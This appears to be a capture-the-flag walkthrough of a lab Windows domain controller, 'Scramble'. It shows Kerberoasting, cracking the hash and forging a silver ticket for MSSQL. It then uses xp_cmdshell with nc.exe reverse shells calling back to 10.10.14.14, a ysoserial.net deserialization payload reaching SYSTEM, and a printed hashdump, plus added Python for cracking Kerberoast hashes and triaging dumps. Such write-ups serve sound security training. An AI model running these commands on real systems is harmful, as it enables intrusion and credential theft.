Basic information

Port scan

Windows domain environment. DNS, Kerberos, LDAP (including the global catalog on 3268/3269), SMB with signing required and MSSQL 2019, all on a host named DC1, mark it as the domain controller for scrm.local:

$ nmap -sC -sV 10.10.11.168
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-22 13:03 CST
Nmap scan report for 10.10.11.168
Host is up (0.21s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Scramble Corp Intranet
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-08-22 05:05:23Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-08-22T05:06:46+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T15:30:57
|_Not valid after: 2023-06-09T15:30:57
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-08-22T05:06:46+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T15:30:57
|_Not valid after: 2023-06-09T15:30:57
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-08-22T05:02:03
|_Not valid after: 2052-08-22T05:02:03
|_ssl-date: 2022-08-22T05:06:46+00:00; +1s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T15:30:57
|_Not valid after: 2023-06-09T15:30:57
|_ssl-date: 2022-08-22T05:06:46+00:00; +1s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-08-22T05:06:46+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T15:30:57
|_Not valid after: 2023-06-09T15:30:57
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2022-08-22T05:06:08
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| ms-sql-info:
| 10.10.11.168:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 193.92 seconds

Port 80

The intranet pages give away some useful information, for example that NTLM authentication has been disabled (so everything has to go over Kerberos) and a username:

ksimpson to sqlsvc

ksimpson's password is the username itself (you can also get to this point by first enumerating ksimpson as a valid user). Add the hosts entry, since Kerberos needs the names to resolve, and continue:

10.10.11.168 dc1.scrm.local scrm.local

Get a TGT:

impacket-getTGT scrm.local/ksimpson:ksimpson

With this TGT, Kerberoast the sqlsvc account to obtain its service-ticket hash:

If the run fails with [-] exceptions must derive from BaseException, update impacket to the latest version.

export KRB5CCNAME=ksimpson.ccache
# -k authenticates with the TGT in KRB5CCNAME, so no password is needed
impacket-GetUserSPNs scrm.local/ksimpson -dc-ip dc1.scrm.local -request -k -no-pass
# or, from a git checkout of impacket
python3 ~/Tools/impacket/examples/GetUserSPNs.py scrm.local/ksimpson -dc-ip dc1.scrm.local -request -k -no-pass -dc-host dc1.scrm.local

Crack the sqlsvc hash (an etype 23 RC4-HMAC ticket, which john's krb5tgs format handles directly):

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Pegasus60

sqlsvc hash

$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$eb5b4db56044be69b6f7dca626249a47$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
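What john is actually doing with each rockyou candidate against a $krb5tgs$23$ line, as an added example that is not part of the original writeup: the script builds a synthetic RC4-HMAC (etype 23) ticket enc-part with this box's sqlsvc naming, prints it in the john/hashcat format, and then cracks it. The ticket body and confounder are constructed (the real one is DER-encoded ASN.1), and MD4 is implemented inline because OpenSSL 3 builds of Python's hashlib usually have it disabled.

```python
"""Kerberoast cracking, step by step (added example; synthetic ticket, not the real one).

A $krb5tgs$23$ line is the RC4-HMAC (etype 23) enc-part of the service ticket:
  checksum = HMAC-MD5(K1, confounder || plaintext)
  edata    = RC4(K3, confounder || plaintext)
  K1 = HMAC-MD5(NT(password), usage),  K3 = HMAC-MD5(K1, checksum)    (RFC 4757 section 6)
The service key is just the NT hash of sqlsvc's password, so a cracker computes
NT(candidate) for each wordlist entry and checks whether the checksum verifies.
"""
import hashlib
import hmac
import os
import struct
from typing import Iterable, Optional

MASK = 0xFFFFFFFF
TICKET_USAGE = 2  # key usage number for the ticket enc-part in an AS-REP/TGS-REP


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, inline because OpenSSL 3 builds of hashlib usually have it disabled."""
    def rol(x: int, n: int) -> int:
        return ((x << n) | (x >> (32 - n))) & MASK
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    order2 = [(i % 4) * 4 + i // 4 for i in range(16)]
    order3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for step in range(48):
            i = step % 16
            if step < 16:    # round 1: F
                f, k, s, add = (b & c) | (~b & d), i, (3, 7, 11, 19)[i % 4], 0
            elif step < 32:  # round 2: G
                f, k, s, add = (b & c) | (b & d) | (c & d), order2[i], (3, 5, 9, 13)[i % 4], 0x5A827999
            else:            # round 3: H
                f, k, s, add = b ^ c ^ d, order3[i], (3, 9, 11, 15)[i % 4], 0x6ED9EBA1
            a = rol((a + f + x[k] + add) & MASK, s)
            a, b, c, d = d, a, b, c   # rotate so the next step updates the next register
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4 of the UTF-16LE password; this is also the RC4-HMAC Kerberos key."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def k1(key: bytes, usage: int) -> bytes:
    return hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()


def kerberoast_line(user: str, realm: str, spn: str, key: bytes,
                    plaintext: bytes, confounder: Optional[bytes] = None) -> str:
    """Encrypt a (constructed) ticket enc-part with RC4-HMAC and emit john's $krb5tgs$23$ form."""
    data = (confounder or os.urandom(8)) + plaintext
    key1 = k1(key, TICKET_USAGE)
    checksum = hmac.new(key1, data, hashlib.md5).digest()
    key3 = hmac.new(key1, checksum, hashlib.md5).digest()
    edata = rc4(key3, data)
    return f"$krb5tgs$23$*{user}${realm}${spn}*${checksum.hex()}${edata.hex()}"


def crack_krb5tgs23(line: str, candidates: Iterable[str]) -> Optional[str]:
    """What john/hashcat do per candidate: derive K3, decrypt, verify the HMAC."""
    head, tail = line.rsplit("*$", 1)          # user/realm/SPN may themselves contain '$'
    if not head.startswith("$krb5tgs$23$*"):
        raise ValueError("not an etype-23 kerberoast line")
    checksum_hex, edata_hex = tail.split("$")
    checksum, edata = bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)
    for pw in candidates:
        key1 = k1(nt_hash(pw), TICKET_USAGE)
        key3 = hmac.new(key1, checksum, hashlib.md5).digest()
        plain = rc4(key3, edata)
        if hmac.compare_digest(hmac.new(key1, plain, hashlib.md5).digest(), checksum):
            return pw
    return None


if __name__ == "__main__":
    # Constructed stand-in for the EncTicketPart; the real one is DER-encoded ASN.1.
    fake_ticket = b"constructed EncTicketPart for sqlsvc" * 2
    line = kerberoast_line("sqlsvc", "SCRM.LOCAL", "scrm.local/sqlsvc", nt_hash("Pegasus60"), fake_ticket)
    print(line[:80] + "...")
    print("cracked:", crack_krb5tgs23(line, ["password", "Summer2022", "Pegasus60"]))
```

Note that verification needs nothing but the NT hash, which is why an account with an SPN and a dictionary password falls this fast, and why the same nt_hash() value reappears below as the silver-ticket key: the roast, the crack and the forged ticket all hinge on one MD4 of the service account's password.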

MSSQLSVC

A direct login to the database with sqlsvc's password does not get in; access still has to go through a Kerberos ticket. Running secretsdump with -debug leaks the domain SID even though ksimpson has no rights to dump anything: the DRSCrackNames call prints the Administrator SID, and the domain SID is everything before the trailing RID (-500). The NT hash of Pegasus60 is sqlsvc's RC4 service key:

impacket-secretsdump -k scrm.local/ksimpson@dc1.scrm.local -no-pass -debug

[+] Calling DRSCrackNames for S-1-5-21-2743207045-1827831105-2542523200-500

# NT hash of Pegasus60 (sqlsvc's service key)
b999a16500b87d17ec7f2e2a68778f05

With the domain SID, the SPN and sqlsvc's NT hash, forge a silver ticket for MSSQLSVC/dc1.scrm.local as Administrator (RID 500). The service validates the ticket with its own key, so the KDC is never consulted and nothing is logged there:

impacket-ticketer -domain scrm.local -spn MSSQLSVC/dc1.scrm.local -user-id 500 Administrator -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200

Use this ticket to talk to MSSQL:

export KRB5CCNAME=Administrator.ccache
impacket-mssqlclient dc1.scrm.local -k -no-pass

Query the database for information; the UserImport table holds a set of LDAP credentials:

SELECT name FROM master.dbo.sysdatabases
use ScrambleHR
select * from ScrambleHR.INFORMATION_SCHEMA.TABLES
select * from UserImport

LdapUser LdapPwd LdapDomain
----------------- -------------------------- -------------------
MiscSvc ScrambledEggs9900 scrm.local

xp_cmdshell can also be enabled to run OS commands (mssqlclient's enable_xp_cmdshell shortcut issues the sp_configure calls for you):

enable_xp_cmdshell
xp_cmdshell whoami

reverse shell

Upload nc.exe and catch a reverse shell:

xp_cmdshell curl 10.10.14.14:7777/nc.exe -o C:\Temp\nc.exe
xp_cmdshell C:\Temp\nc.exe -e powershell 10.10.14.14 4444

miscsvc & user flag

From the PowerShell shell, run commands as MiscSvc with the credentials pulled from the database and get the user flag. Invoke-Command targets dc1 by name so that the WinRM session authenticates with Kerberos, which matters here since NTLM is disabled on this domain:

$SecPassword = ConvertTo-SecureString 'ScrambledEggs9900' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('Scrm\MiscSvc', $SecPassword)
# sanity check: the credential works and the session runs as MiscSvc
Invoke-Command -ComputerName dc1 -Credential $Cred -ScriptBlock { whoami }

# then spawn a second reverse shell as MiscSvc (start a fresh nc listener on 4444 first)
Invoke-Command -ComputerName dc1 -Credential $Cred -ScriptBlock { cmd /c C:\Temp\nc.exe -e powershell 10.10.14.14 4444 }

This gives a reverse shell as miscsvc, and user.txt is on the desktop:

Sales Order Client

C:\Shares\IT\Apps\Sales Order Client holds an exe and a dll; together with the information on the intranet page, this is the client for the service on port 4411. Download both for analysis:

# msf is simply the easiest way to move files back and forth here
curl 10.10.14.14:7777/msf.exe -o C:\Temp\msf.exe

meterpreter > download ScrambleClient.exe
meterpreter > download ScrambleLib.dll

ScrambleClient.exe

Decompiling it shows the command format the service accepts and that the UploadOrder function deserializes the submitted order:

root flag

The deserialization uses BinaryFormatter on attacker-controlled input, and the service runs as SYSTEM, so a ysoserial.net gadget chain gives code execution as SYSTEM:

.\ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c "C:\Temp\msf.exe"
# copy the base64 output and send it as the payload of an UPLOAD_ORDER command
nc 10.10.11.168 4411
UPLOAD_ORDER;<base64 payload>

Read root.txt and dump the hashes:

hashdump

administrator:500:aad3b435b51404eeaad3b435b51404ee:e2bba07a8348bca150ac6ffee6a3afbb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0d3c072340cb5cdfca9c7f86e47a0beb:::
tstar:1106:aad3b435b51404eeaad3b435b51404ee:5b8b52689acd5a0e6587f9c8d3b07fc7:::
asmith:1107:aad3b435b51404eeaad3b435b51404ee:0a7e978fd5e254ce555e5fed405bba29:::
sjenkins:1118:aad3b435b51404eeaad3b435b51404ee:ac5495fa8515a5e8c3437a293b405e26:::
sdonington:1119:aad3b435b51404eeaad3b435b51404ee:ac5495fa8515a5e8c3437a293b405e26:::
backupsvc:1601:aad3b435b51404eeaad3b435b51404ee:6f410302e092bdcf7802401cc55e4a4d:::
jhall:1603:aad3b435b51404eeaad3b435b51404ee:dfdcc85f5a1c9eaf0592f36582f3b871:::
rsmith:1604:aad3b435b51404eeaad3b435b51404ee:dfdcc85f5a1c9eaf0592f36582f3b871:::
ehooker:1605:aad3b435b51404eeaad3b435b51404ee:a0a5fa8b2f1df7d4acfca315e4a3ba82:::
khicks:1611:aad3b435b51404eeaad3b435b51404ee:589cf9b5f911fd6fe70694a4ba4bccd0:::
sqlsvc:1613:aad3b435b51404eeaad3b435b51404ee:b999a16500b87d17ec7f2e2a68778f05:::
miscsvc:1617:aad3b435b51404eeaad3b435b51404ee:c959a21bb08e42e36ff9f0fa434caab5:::
ksimpson:1619:aad3b435b51404eeaad3b435b51404ee:5f38c0485f0c23f8dedf9bf23ffa5336:::
DC1$:1000:aad3b435b51404eeaad3b435b51404ee:fcd57ce58a2ab9e221df906588a863c2:::
WS01$:1120:aad3b435b51404eeaad3b435b51404ee:327202ce3bff07c2ea53d7f25d162fcb:::
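A quick triage of a dump like the one above, as an added example that is not part of the original writeup: it parses pwdump-format lines and flags the empty-password NT hash (31d6cf..., the Guest account here), any account that still has a real LM hash stored (none here, aad3b4... is the blank LM value), machine accounts, the RID 500/502 principals, and accounts that share an NT hash and therefore share a password (sjenkins/sdonington and jhall/rsmith above). The dump text embedded below is the one from this page so the script runs offline.

```python
"""Triage a pwdump/secretsdump-style hash dump (added example, not from the writeup)."""
from collections import defaultdict
from typing import Dict, List, NamedTuple

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of the empty string: no LM hash stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # MD4 of empty UTF-16LE: the account has no password


class Entry(NamedTuple):
    user: str
    rid: int
    lm: str
    nt: str


def parse_pwdump(text: str) -> List[Entry]:
    """Parse 'user:rid:lm:nt:::' lines; blank or malformed lines are skipped."""
    entries = []
    for raw in text.splitlines():
        parts = raw.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        entries.append(Entry(parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()))
    return entries


def triage(entries: List[Entry]) -> Dict[str, object]:
    by_nt = defaultdict(list)
    for e in entries:
        by_nt[e.nt].append(e.user)
    return {
        "empty_password": sorted(e.user for e in entries if e.nt == EMPTY_NT),
        "lm_stored": sorted(e.user for e in entries if e.lm != EMPTY_LM),
        "machine_accounts": sorted(e.user for e in entries if e.user.endswith("$")),
        # same NT hash means same password: cracking one entry unlocks every name in the group
        "shared_password": {nt: sorted(users) for nt, users in by_nt.items()
                            if len(users) > 1 and nt != EMPTY_NT},
        "high_value_rids": sorted(e.user for e in entries if e.rid in (500, 502)),  # Administrator, krbtgt
    }


# The hashdump from this page, embedded so the script runs without the box.
DUMP = """\
administrator:500:aad3b435b51404eeaad3b435b51404ee:e2bba07a8348bca150ac6ffee6a3afbb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0d3c072340cb5cdfca9c7f86e47a0beb:::
tstar:1106:aad3b435b51404eeaad3b435b51404ee:5b8b52689acd5a0e6587f9c8d3b07fc7:::
asmith:1107:aad3b435b51404eeaad3b435b51404ee:0a7e978fd5e254ce555e5fed405bba29:::
sjenkins:1118:aad3b435b51404eeaad3b435b51404ee:ac5495fa8515a5e8c3437a293b405e26:::
sdonington:1119:aad3b435b51404eeaad3b435b51404ee:ac5495fa8515a5e8c3437a293b405e26:::
backupsvc:1601:aad3b435b51404eeaad3b435b51404ee:6f410302e092bdcf7802401cc55e4a4d:::
jhall:1603:aad3b435b51404eeaad3b435b51404ee:dfdcc85f5a1c9eaf0592f36582f3b871:::
rsmith:1604:aad3b435b51404eeaad3b435b51404ee:dfdcc85f5a1c9eaf0592f36582f3b871:::
ehooker:1605:aad3b435b51404eeaad3b435b51404ee:a0a5fa8b2f1df7d4acfca315e4a3ba82:::
khicks:1611:aad3b435b51404eeaad3b435b51404ee:589cf9b5f911fd6fe70694a4ba4bccd0:::
sqlsvc:1613:aad3b435b51404eeaad3b435b51404ee:b999a16500b87d17ec7f2e2a68778f05:::
miscsvc:1617:aad3b435b51404eeaad3b435b51404ee:c959a21bb08e42e36ff9f0fa434caab5:::
ksimpson:1619:aad3b435b51404eeaad3b435b51404ee:5f38c0485f0c23f8dedf9bf23ffa5336:::
DC1$:1000:aad3b435b51404eeaad3b435b51404ee:fcd57ce58a2ab9e221df906588a863c2:::
WS01$:1120:aad3b435b51404eeaad3b435b51404ee:327202ce3bff07c2ea53d7f25d162fcb:::
"""


if __name__ == "__main__":
    for finding, value in triage(parse_pwdump(DUMP)).items():
        print(f"{finding}: {value}")
```

The shared_password groups are the first thing to feed back into cracking: every hash in a group only has to be cracked once, and a pair of unrelated users with an identical NT hash usually means a default or onboarding password that is worth trying against the rest of the domain.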
